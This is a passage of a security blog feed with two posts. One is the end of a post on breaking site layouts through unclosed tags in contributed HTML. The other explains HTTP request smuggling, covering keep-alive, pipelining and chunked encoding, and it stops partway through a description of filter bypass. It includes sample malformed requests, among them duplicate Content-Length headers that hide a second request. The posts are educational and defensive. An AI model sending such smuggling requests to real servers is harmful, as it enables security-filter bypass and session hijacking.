&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t5.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t6.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t5.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t6.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t7.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t8.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t7.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t8.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t9.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t10.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t9.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t10.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t11.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t12.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t11.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t12.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t13.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t14.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t13.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t14.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t15.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t16.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t15.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;
&lt;iframe src=/theme/resource/t16.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td&gt;&lt;small&gt;&lt;a href=&quot;//regilero.github.io/theme/resource/t17.html&quot;&gt;direct link&lt;/a&gt;&lt;/small&gt;&lt;/td&gt;&lt;td&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;td&gt;
&lt;iframe src=//regilero.github.io/theme/resource/t17.html style=&quot;height:450px; width: 350px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;&lt;/td&gt;&lt;td&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/table&gt;


&lt;p&gt;&lt;strong&gt;H1, H2, H3, PRE, LI&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;These are the tags I prefer because chances are that they are in the list of allowed tags for contributors.&lt;/p&gt;

&lt;h3&gt;Will it break &lt;code&gt;&amp;lt;section&amp;gt;&lt;/code&gt; or &lt;code&gt;&amp;lt;article&amp;gt;&lt;/code&gt;?&lt;/h3&gt;

&lt;p&gt;Yes.&lt;/p&gt;

&lt;p&gt;First, if you allow &lt;code&gt;&amp;lt;section&amp;gt;&lt;/code&gt; or &lt;code&gt;&amp;lt;article&amp;gt;&lt;/code&gt; in allowed contributors tags, it
will obviously allow the contributor to close such tags, so this would be a very
bad move.&lt;/p&gt;

&lt;p&gt;More generaly, if you use one &lt;code&gt;&amp;lt;DIV&amp;gt;&lt;/code&gt; on your layout, closing this tag will also
close any &lt;code&gt;&amp;lt;section&amp;gt;&lt;/code&gt; or &lt;code&gt;&amp;lt;article&amp;gt;&lt;/code&gt; embedded inside.&lt;/p&gt;

&lt;p&gt;Let&#39;s see this in action in a more complex layout:&lt;/p&gt;

&lt;p&gt;Here is a new iframe with a full layout, you can see a div around the article.&lt;/p&gt;

&lt;iframe src=/theme/resource/t18.html style=&quot;height:450px; width: 700px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;


&lt;p&gt;And here is this layout after a bad comment closing the comment and main divs (the real aside section and footers are far in the bottom):&lt;/p&gt;

&lt;iframe src=/theme/resource/t19.html style=&quot;height:450px; width: 700px; border: 1px solid #ccc;&quot;&gt;&lt;/iframe&gt;


&lt;h3&gt;What if direct HTML is not allowed?&lt;/h3&gt;

&lt;p&gt;If the only way to contribute is Markdown, reStructuredText or other wiki-like syntaxes, you
cannot directly insert bad HTML, in theory.&lt;/p&gt;

&lt;p&gt;Well, for Markdown it depends of the flavor. By default, you can include raw
HTML in Markdown, unless this feature is removed.&lt;/p&gt;

&lt;p&gt;Anyway, with a language generating HTML the game is to find strange syntax in
this language which will generate bad HTML.&lt;/p&gt;

&lt;p&gt;Be careful, preview modes are usually made with syntax parsers written in JavaScript. These
parsers are usually less robust than the real final generators. So a bad syntax
in a preview mode means almost nothing.&lt;/p&gt;

&lt;p&gt;I wont give you specific syntax error examples, it depends on the engine, you&#39;ll
have to research on your own.&lt;/p&gt;

&lt;h2&gt;Protections&lt;/h2&gt;

&lt;p&gt;If you want to allow contributions, here are some thoughts:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Why not simply allowing unformatted text?&lt;/li&gt;
&lt;li&gt;Why allowing &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt;? If you use &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; in your layout you could in fact
prevent any contributions from using this HTML tag.&lt;/li&gt;
&lt;li&gt;More generally do not allow tags used for your layout structure (like article or section)&lt;/li&gt;
&lt;li&gt;Check your CMS if you CMS provides HTML syntax cleanup (Drupal does, for example)&lt;/li&gt;
&lt;li&gt;Avoid regexps to cleanup (filter) contributed HTML, prefer DOM-based tools
when they are available. These tools will analyze text input, build a dom tree, then
generate HTML output from the tree, so tags will always be in the right order,
and can even be filtered for attributes and id cleanup.&lt;/li&gt;
&lt;li&gt;That said, regexp-based filters might also work and perform the same filtering
task, here is for example &lt;a href=&quot;https://www.drupal.org/project/wysiwyg_filter&quot; title=&quot;Drupal WYSIWYG filter&quot;&gt;a very good drupal7 module, wysiwyg_filter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;

</description>
				<published>2016-06-10 00:00:00 +0200</published>
				<link>http://regilero.github.io/english/security/2016/06/10/security_play_with_implicit_html_and_closing_divs/</link>
			</item>
		
			<item>
				<title>Checking HTTP Smuggling issues in 2015 - Part1</title>
				<description>&lt;p&gt;&lt;small&gt; &lt;strong&gt;English version&lt;/strong&gt; (&lt;strong&gt;Version Française&lt;/strong&gt; disponible sur &lt;a href=&quot;http://makina-corpus.com/blog/metier/2015/problemes-de-http-smuggling-contrebandede-http-en-2015-partie-1&quot;&gt;makina corpus&lt;/a&gt;.)&lt;/small&gt;&lt;/p&gt;

&lt;p&gt;The goal of this serie of articles is to explain clearly what are HTTP smuggling
issues and why I think this sort of security issues are critically important and
could be used in massive attacks against modern web services.&lt;/p&gt;

&lt;p&gt;In the last 6 months I&#39;ve been struggling with the state of several open source HTTP
servers, and helped fixing several issues. The main problem encountered was,
usually, to explain the problem.&lt;/p&gt;

&lt;p&gt;A first big study on smuggling was done in 2005 and lead to several corrections.
This was was done by &lt;strong&gt;Chaim Linhart&lt;/strong&gt;, &lt;strong&gt;Amit Klein&lt;/strong&gt;, &lt;strong&gt;Ronen Heled&lt;/strong&gt; and &lt;strong&gt;Steve Orrin&lt;/strong&gt;,
published by Watchfire and &lt;a href=&quot;http://www.cgisecurity.com/lib/HTTP-Request-Smuggling.pdf&quot; title=&quot;HTTP Request Smuggling - watchfire (pdf)&quot;&gt;still worth a read ten years after&lt;/a&gt;.
Today even the HTTP/1.1 RFC 7230 contains &lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-3.3.3&quot; title=&quot;3.3.3. Message Body Length&quot;&gt;protections&lt;/a&gt;
and &lt;a href=&quot;https://tools.ietf.org/html/rfc7230#section-9.5&quot; title=&quot;9.5. Request Smuggling&quot;&gt;warnings&lt;/a&gt; against Request Smuggling, but
an RFC is just a reference, things are really different when you check the
implementations. And a lot of people are now starting their own implementations.
Seems that a refresh was needed.&lt;/p&gt;

&lt;p&gt;Most of the links provided in this article should be easier to understand
&lt;em&gt;after&lt;/em&gt; reading this first part. This is gonna be a long serie, starting from
simple HTTP requests to very strange ones, with details about recently fixed
flaws on  several tools (and some CVE also). On this first article there is
nothing &lt;strong&gt;new&lt;/strong&gt;, just another way of explaining the problems. I hope this will
at least help refreshing memories on the problems.&lt;/p&gt;

&lt;p&gt;If you use HTTP servers, and especially if you use several HTTP agents (Reverse
Proxies, SSL Terminators, Load balancers, etc.), you should be interested by this.
If you build an HTTP agent you should master it, best thing would be knowing all
this better than me, if you spot any error, do not hesitate to comment or
&lt;a href=&quot;mailto:regis.leroy@makina-corpus.com&quot;&gt;contact me&lt;/a&gt;.&lt;/p&gt;

&lt;h2&gt;HTTP Smuggling: What?&lt;/h2&gt;

&lt;h3&gt;Hiding HTTP queries in HTTP, Injection&lt;/h3&gt;

&lt;p&gt;That&#39;s it, the main idea is to hide HTTP in HTTP.&lt;/p&gt;

&lt;p&gt;To hide a message in a protocol you need to find a flaw, an issue, in the way an
agent is interpreting (reading) the message.&lt;/p&gt;

&lt;p&gt;HTTP Request smuggling is simply an injection of HTTP protocol into the HTTP
protocol. As always with security the main problem is &lt;strong&gt;injection&lt;/strong&gt;. If you can
inject SQL into SQL, HTML, javascript or css into an HTML response... you have
problems.&lt;/p&gt;

&lt;p&gt;When injecting javascript in a an HTML page you need to find a flaw in the
application outputing some user content. Here the players will &lt;strong&gt;tracks flaws in
the parsing of HTTP messages&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;Some security problems closely related to HTTP smuggling are &lt;strong&gt;HPP&lt;/strong&gt; (HTTP
parameters pollution) that you can read on the
&lt;a href=&quot;https://www.owasp.org/images/b/ba/AppsecEU09_CarettoniDiPaola_v0.8.pdf&quot; title=&quot;HTTP Parameter Pollution&quot;&gt;Stefano di Paola &amp;amp; Luca Carettoni paper in OWASP 09&lt;/a&gt; and
&lt;a href=&quot;https://www.owasp.org/index.php/HTTP_Response_Splitting&quot; title=&quot;HTTP Response Splitting&quot;&gt;&lt;strong&gt;HTTP Response splitting&lt;/strong&gt;&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;HPP&lt;/strong&gt; is a very specific
part of HTTP Smuggling, considering only the parameters used on the location and
 the problems arising from differences in the interpretations of strange
parameters (like repetitions of same url parameter).&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Response splitting&lt;/strong&gt; is an attack used on an application (on the final backend)
where the backend will send more HTTP responses than expected. It&#39;s a tool that
could be used in HTTP Smuggling, but flaws are uncommon (they were problems with
newlines injections in PHP redirections or in Digest authentication username,
but this was a long time ago).&lt;/p&gt;

&lt;p&gt;Here I will mostly talk about &lt;em&gt;regular&lt;/em&gt; HTTP Smuggling, flaws coming from HTTP
syntax mistakes and protocol approximations.&lt;/p&gt;

&lt;h3&gt;Why?&lt;/h3&gt;

&lt;p&gt;We&#39;ll study in details the 3 main kinds of attacks below. But if you can hide
HTTP in HTTP you can perform various forms of attack, going from bypassing
security checks to hijacking user sessions or defacing content in caches.&lt;/p&gt;

&lt;p&gt;This is the story of several HTTP queries. Let&#39;s say we have at least 3
different queries, we&#39;ll name theses queries for clarity:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Suzann&lt;/strong&gt;: the &lt;strong&gt;S&lt;/strong&gt;muggler query,&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Ivan&lt;/strong&gt;: the &lt;strong&gt;I&lt;/strong&gt;nnocent query,&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Walter&lt;/strong&gt;: the &lt;strong&gt;W&lt;/strong&gt;ookie, accomplice of the smuggler, usually a Forbidden
query. And, yes, it&#39;s a wookie. Because usually smugglers are working with
wookies.&lt;/li&gt;
&lt;/ul&gt;


&lt;p&gt;They will transit from one starting point, the attacker computer, to an HTTP
server (your HTTP server). And sometimes they will encounter a middleware server,
which is also reading and emitting HTTP. This could be a Load Balancer, an SSL
terminator, a reverse proxy cache, as static cache, etc.&lt;/p&gt;

&lt;p&gt;Suzann the smuggler is &lt;strong&gt;evil&lt;/strong&gt;, the goal of this query is to attack Ivan the
innocent.&lt;/p&gt;

&lt;p&gt;Suzann will not be a regular HTTP query like this:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /suzann.html HTTP/1.1\r\n
Host: www.example.com\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n
Accept-Encoding: gzip, deflate\r\n
Cache-Control: max-age=0\r\n
Connection: keep-alive\r\n
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0\r\n
\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Instead it could be something like that (not all in the same time :-) ):&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET http://www.example.com/suzann.html?foo=%00\tHTTP/11111111111.2\r\n
     HOST: www.evil1.com\r\n
HOST: www.evil2.com\r\n
Content-length: 0\r\n
ContenT-length :\t100\r\n
Connection: keep-alive\n
 Content-length:\t10\r
 Transfer-eNCODIng\t\t:chunked\t\r\n
\r\n
(...)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And your server should reject most of the strange things present in this request
 example (this one is soo bad that I do not think any server would accept it).
If a flaw is found in the server it &lt;em&gt;could&lt;/em&gt; be used for smuggling and the
attacker could start to think about exploitations of the flaw.&lt;/p&gt;

&lt;p&gt;We&#39;ll start by a big rollback and give some details about HTTP to understand
all this.&lt;/p&gt;

&lt;h2&gt;HTTP&lt;/h2&gt;

&lt;p&gt;Back in the old time they were only a very old version of HTTP available (that
we call HTTP/0.9). Smuggling was not available. The only way to send 3
queries was opening 3 time a tcp/ip connection to the server and each time
asking for the targeted document:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;--&amp;gt; open tcp/ip conn1
GET /Suzann.html\r\n
\r\n
&amp;lt;-- receive Suzann.html document
&amp;lt;html&amp;gt;\r\n
&amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;\r\n
&amp;lt;body&amp;gt;Suzann&amp;lt;/body&amp;gt;\r\n
&amp;lt;/html&amp;gt;\r\n
&amp;lt;-- conn1 is closed

--&amp;gt; open tcp/ip conn1
GET http://your.server.com/ivan.html\r\n
\r\n
&amp;lt;-- receive ivan.html document
&amp;lt;html&amp;gt;\r\n
&amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;\r\n
&amp;lt;body&amp;gt;Ivan&amp;lt;/body&amp;gt;\r\n
&amp;lt;/html&amp;gt;\r\n
&amp;lt;-- conn1 is closed

--&amp;gt; open tcp/ip conn1
GET /walter.html\r\n
\r\n
&amp;lt;-- receive walter.html document
&amp;lt;html&amp;gt;\r\n
&amp;lt;head&amp;gt;&amp;lt;/head&amp;gt;\r\n
&amp;lt;body&amp;gt;Walter&amp;lt;/body&amp;gt;\r\n
&amp;lt;/html&amp;gt;\r\n
&amp;lt;-- conn1 is closed
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;HTTP is a quite simple protocol, especially at this time. Note that I&#39;m using
&lt;code&gt;\r\n&lt;/code&gt; to represent the CR and LF characters end-of-line markers.
This will get important later.&lt;/p&gt;

&lt;p&gt;Then comes HTTP/1.0, with one important thing added, the &lt;strong&gt;headers&lt;/strong&gt;. You &lt;em&gt;can&lt;/em&gt;
add them in the request, and the response will always contains headers.&lt;/p&gt;

&lt;p&gt;The first query became:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;--&amp;gt; open tcp/ip conn1
GET /suzann.html HTTP/1.0\r\n
Host: your.server.com\r\n
User-agent: information gateways navigator 0.8\r\n
Accept: text/html\r\n
Foo Bar\r\n
\r\n
&amp;lt;-- receive Suzann.html document
HTTP/1.0 400 Bad Request\r\n
Server: Apache\r\n
Date: Fri, 24 Jul 1612 16:24:10 GMT\r\n
Content-Type: text/html\r\n
Content-Length: 138\r\n
Connection: close\r\n
\r\n
&amp;lt;html&amp;gt;\r\n
&amp;lt;head&amp;gt;&amp;lt;title&amp;gt;400 Bad Request&amp;lt;/title&amp;gt;&amp;lt;/head&amp;gt;\r\n
&amp;lt;body bgcolor=&quot;white&quot;&amp;gt;\r\n
&amp;lt;center&amp;gt;&amp;lt;h1&amp;gt;400 Bad Request&amp;lt;/h1&amp;gt;&amp;lt;/center&amp;gt;\r\n
&amp;lt;/body&amp;gt;\r\n
&amp;lt;/html&amp;gt;\r\n
&amp;lt;-- conn1 is closed
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;In this response the important thing to note is &lt;strong&gt;Content-Length: 138&lt;/strong&gt;. If you
count all characters, starting at &lt;code&gt;&amp;lt;html&lt;/code&gt;, including the end-of-line characters,
you have exactly 138 characters, with one byte for each ascii7 character, 138
bytes. It seems size matters, and we&#39;ll see that &lt;strong&gt;size is everything&lt;/strong&gt; in our
problem. Here we also have an error code (400), the server said we made a
mistake in our query, this is not a problem, it&#39;s a nice thing to have in a
protocol (error messages). The error was a missing &#39;:&#39; between Foo and Bar.&lt;/p&gt;

&lt;p&gt;Let&#39;s go quickly to HTTP/1.1, the real HTTP protocol, still used almost
everywhere. The new HTTP/2 protocol is just starting to replace it on some
very limited places.&lt;/p&gt;

&lt;p&gt;We have several new features on HTTP/1.1 that will allow very bad behaviors for
&lt;em&gt;Suzann the smuggler&lt;/em&gt;, with some other features, less important for
smugglers (like the Host Header which is now required, it was optional before).&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Keep Alive&lt;/strong&gt; mode&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Pipelined&lt;/strong&gt; queries&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Chunked&lt;/strong&gt; queries and responses&lt;/li&gt;
&lt;/ul&gt;


&lt;h3&gt;Keep Alive&lt;/h3&gt;

&lt;p&gt;With keep Alive we can open a connection to the server, request Suzann, receive
Suzann, then request Ivan and receive it, and at lastly request Walter and
receive it, in the same TCP/IP connection.&lt;/p&gt;

&lt;p&gt;As an HTTP client you can ask for keepAlive mode, but it&#39;s usually enabled by
default by the server even if you do not ask for it. You do it by adding this
header on the request:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Connection: keepalive
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;On the server side, the keep alive connection can be cut at any time (and most
servers should try to avoid long opened keep alive connections, especially if
they keep one dedicated process for each connection and cannot afford more than
a few hundred processes like the Apache httpd prefork mpm).&lt;/p&gt;

&lt;p&gt;On the response headers you will find:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Connection: close # means we&#39;re closing, easy
Connection: keep-alive # means we&#39;ll try to maintain this open a few seconds
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Usually, after a &lt;code&gt;close&lt;/code&gt; the server will close the tcp/ip connection.&lt;/p&gt;

&lt;p&gt;The goal of this was to retrieve faster all assets coming with an HTML page, by
reusing the tcp/ip connection opened for the document, avoiding the slow tcp/ip
connection opening.&lt;/p&gt;

&lt;p&gt;This keep-alive mode in the protocol is what things like Comet are trying to
exploit to maintain pseudo-infinite-time push/pull connections over HTTP. But
even without this advanced mode, keep-alive is used a lot in HTTP
environments, especially between the end-user and the first part of the
middleware. Usage of keep-alive between HTTP servers and proxies (in the
middleware or between the middleware and the backend) is less common.&lt;/p&gt;

&lt;h3&gt;Pipelines \o/&lt;/h3&gt;

&lt;p&gt;The other big thing in HTTP/1.1 is pipelining. Pipelining is sending several
queries &lt;strong&gt;before&lt;/strong&gt; having the responses of theses requests.&lt;/p&gt;

&lt;p&gt;Here&#39;s a schema of basic pipelining:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    [Client]                  [End Server]
        |                         |
        &amp;gt;-requ. Suzann ----------&amp;gt;|
        &amp;gt;-requ. Ivan ------------&amp;gt;|
        &amp;gt;-requ. Walter-----------&amp;gt;|
        |&amp;lt;---------- resp. Suzann-&amp;lt;
        |&amp;lt;------------ resp. Ivan-&amp;lt;
        |&amp;lt;---------- resp. Walter-&amp;lt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;With only Keep Alive the schema was:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    [Client]                  [End Server]
        |                         |
        &amp;gt;-requ. Suzann ----------&amp;gt;|
        |&amp;lt;---------- resp. Suzann-&amp;lt;
        &amp;gt;-requ. Ivan ------------&amp;gt;|
        |&amp;lt;------------ resp. Ivan-&amp;lt;
        &amp;gt;-req. Walter------------&amp;gt;|
        |&amp;lt;---------- resp. Walter-&amp;lt;
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;With an HTTP proxy in the middle the schema is, usually:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    [Client]             [Middleware]          [End Server]
        |                     |                     |
        &amp;gt;-requ. Suzann ------&amp;gt;|                     |
        &amp;gt;-requ. Ivan --------&amp;gt;|                     |
        &amp;gt;-req. Walter -------&amp;gt;|                     |
        |                     &amp;gt;-requ. Suzann ------&amp;gt;|
        |                     |&amp;lt;------ resp. Suzann-&amp;lt;
        |&amp;lt;------ resp. Suzann-&amp;lt;                     |
        |                     &amp;gt;-requ. Ivan --------&amp;gt;|
        |                     |&amp;lt;-------- resp. Ivan-&amp;lt;
        |&amp;lt;-------- resp. Ivan-&amp;lt;                     |
        |                     &amp;gt;-req. Walter--------&amp;gt;|
        |                     |&amp;lt;------- resp Walter-&amp;lt;
        |&amp;lt;------ resp. Walter-&amp;lt;                     |
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;You can see that the connection between the middle agent (a reverse proxy cache
or an SSL terminator) and the end server is usually not using pipelining
(because that&#39;s an awfully complex thing to do well with HTTP).&lt;/p&gt;

&lt;p&gt;Sometimes the connection between the middleware and the end server is even not
using Keep Alive connections. Some other times it&#39;s reusing a pool of tcp keep
alive connections. But the first protection against HTTP smuggling applied here
is breaking your pipeline of requests in several requests, waiting for the
end of a first request before handling the next one.&lt;/p&gt;

&lt;p&gt;Eventually, the server is &lt;strong&gt;never&lt;/strong&gt; expected to respond to all requests in a
pipeline. You can get the first response with a &lt;code&gt;Connection: close&lt;/code&gt; header,
cutting the Keep Alive connection right after the response.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    [Client]             [Middleware]          [End Server]
        |                     |                     |
        &amp;gt;-requ. Suzann ------&amp;gt;|                     |
        &amp;gt;-requ. Ivan --------&amp;gt;|                     |
        &amp;gt;-req. Walter -------&amp;gt;|                     |
        |                     &amp;gt;-requ. Suzann ------&amp;gt;|
        |                     |&amp;lt;------ resp. Suzann-&amp;lt;
        |&amp;lt;------ resp. Suzann-&amp;lt;                     |
[ client is expected to re-send Ivan &amp;amp; Walter queries]
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;And this is the second big protection against smuggling. As soon as the
middleware detects a bad Suzann query, it should send a &lt;strong&gt;400 bad request&lt;/strong&gt;
 response &lt;strong&gt;and&lt;/strong&gt; close the connection (but if you really search you&#39;ll find
examples of proxies which does not close the keep alive after an error).&lt;/p&gt;

&lt;h3&gt;Chunks&lt;/h3&gt;

&lt;p&gt;Chunked transfer is an alternate way of transmitting long HTTP messages. Instead
of a transmission starting with a &lt;code&gt;Content-length&lt;/code&gt; header announcing the full
message size you can transmit the message by small (or not) chunks, each one
annoucing a size (in hexadecimal format).&lt;/p&gt;

&lt;p&gt;A special &lt;strong&gt;last-chunk&lt;/strong&gt; empty chunk marks the end of the message.&lt;/p&gt;

&lt;p&gt;We&#39;ll certainly study in detail chunks in next articles. The important thing
with chunks is that&#39;s it is another way of manipulating the size of the message.&lt;/p&gt;

&lt;p&gt;Chunks can be used on HTTP responses (usually) but also on queries.&lt;/p&gt;

&lt;p&gt;For an example you can read the &lt;a href=&quot;https://en.wikipedia.org/wiki/Chunked_transfer_encoding&quot; title=&quot;Chunked transfer encoding&quot;&gt;Wikipedia page&lt;/a&gt; explaining how
chunks can be used to transfer this:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;Wikipedia in\r\n\r\nchunks.
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;as:&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;4\r\n
Wiki\r\n
5\r\n
pedia\r\n
e\r\n
 in\r\n\r\nchunks.\r\n
0\r\n
\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;So much fun :-)&lt;/p&gt;

&lt;h2&gt;The key: Size matters&lt;/h2&gt;

&lt;p&gt;I said it several times. But, yes, size matters. To inject HTTP in HTTP the
key is usually to trick the HTTP agent reader about the size of your message.&lt;/p&gt;

&lt;p&gt;HTTP queries and responses are mostly a list of strings separated by end of lines.
And we saw with pipelines that you could send several queries, one after another.&lt;/p&gt;

&lt;p&gt;The HTTP agent reading the queries or parsing the responses MUST know where this
list of strings ends. this way, the agent can check if what&#39;s coming after is
another query (or response if it&#39;s a backend stream).&lt;/p&gt;

&lt;p&gt;The tools used by the HTTP reader is either the &lt;strong&gt;chunks mecanism&lt;/strong&gt; or the
&lt;strong&gt;Content-Length&lt;/strong&gt; header.&lt;/p&gt;

&lt;p&gt;And if something goes wrong &lt;strong&gt;here&lt;/strong&gt; you can start hiding some queries or
responses. One of the composants will parse the stream and will not understand the
incoming characters as new requests but as the previous request body, or will not
understand the stream as the first request response but as a new one.&lt;/p&gt;

&lt;p&gt;That&#39;s the key of HTTP Smuggling.&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;GET /suzann.html HTTP/1.1\r\n
Host: example.com\r\n
Content-Length: 0\r\n
Content-Length: 46\r\n
\r\n
GET /walter.html HTTP/1.1\r\n
Host: example.com\r\n
\r\n
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Here if you accept the first Content-length header you have 2 requests. If you
take the second one as the right one instead, then you have one GET query, with
a body containing some bytes that you do not care about -- even if it looks like
 a query-- (a GET query with a body is something strange, POST query have bodies
and usually GET queries have only parameters, but it is allowed).&lt;/p&gt;

&lt;p&gt;Ok, so it&#39;s one OR two queries, no problem, but if you are a proxy seing one
query and transmitting this unique query to a backend which then sends you 2
responses you&#39;d better know what to do with this second response. Or maybe it
would have been better to detect a bad HTTP request and avoid this problem.&lt;/p&gt;

&lt;h2&gt;HTTP Smuggling: the basics&lt;/h2&gt;

&lt;p&gt;HTTP smuggling may be used in 3 sort attacks (mainly).&lt;/p&gt;

&lt;h3&gt;Attack 1 : Bypass security filters&lt;/h3&gt;

&lt;p&gt;The first type of attack is &lt;strong&gt;bypassing security filters on Walter forbidden
query&lt;/strong&gt;. In this type of attack the Walter query is forbidden (Wookies is a
forbidden species), but Suzann is
hiding Walter from the middleware filters (storm troopers filtering the docks).&lt;br/&gt;
Eventually Walter is executed on the target, behind the filters (was hidden in
the cargo).&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;    [Attacker]              [Middleware]             [End Server]
        |                       |                        |
        &amp;gt;-req. Suzann(+Walter)-&amp;gt;|                        |
        |                       &amp;gt;-requ. Suzann(+Walter)-&amp;gt;|
        |                       |             \-Suzann--&amp;gt;|
